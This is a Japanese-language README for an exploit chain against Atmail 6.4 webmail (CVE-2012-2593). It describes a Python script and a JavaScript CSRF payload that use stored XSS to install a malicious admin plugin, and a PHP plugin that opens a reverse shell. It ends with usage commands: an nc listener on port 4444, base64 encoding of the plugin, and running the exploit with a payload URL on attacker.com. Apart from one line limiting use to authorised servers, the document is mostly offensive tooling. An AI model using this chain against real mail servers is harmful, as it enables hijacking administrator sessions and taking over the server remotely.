
Atmail XSS-CSRF-RCE エクスプロイトチェーン
atmail-rce.py: AtmailのWebメールインターフェースにおけるCVE-2012-2593を悪用します。
atmail-csrf.js: CVE 2012-2593をCSRFに利用し、リバースシェルを実行する悪意のあるプラグインをインストールするJavaScriptファイル
Plugin.php: インストールされるAtmailプラグイン。リバースシェルを呼び出します。
!!テストの許可があるサーバーに対してのみ使用してください
Atmailメールサーバーバージョン6.4には、Dateメールヘッダーとメール本文(iFrameインジェクションを介して)の両方にXSS脆弱性があります。これは、JavaScript XHR APIを使用して管理者ユーザーのCookieを含むリクエストを管理Webパネルに送信し、リバースシェルを実行するコードを実行する悪意のあるプラグインをインストールするCSRFに利用されます。
nc -lvp 4444gzip -c Plugin.php | base64 | tr -d [:space:]python3 ./atmail-rce.py -u attacker@localhost -r admin@localhost -x http://attacker.com/malicious.js -t http://atmail.com/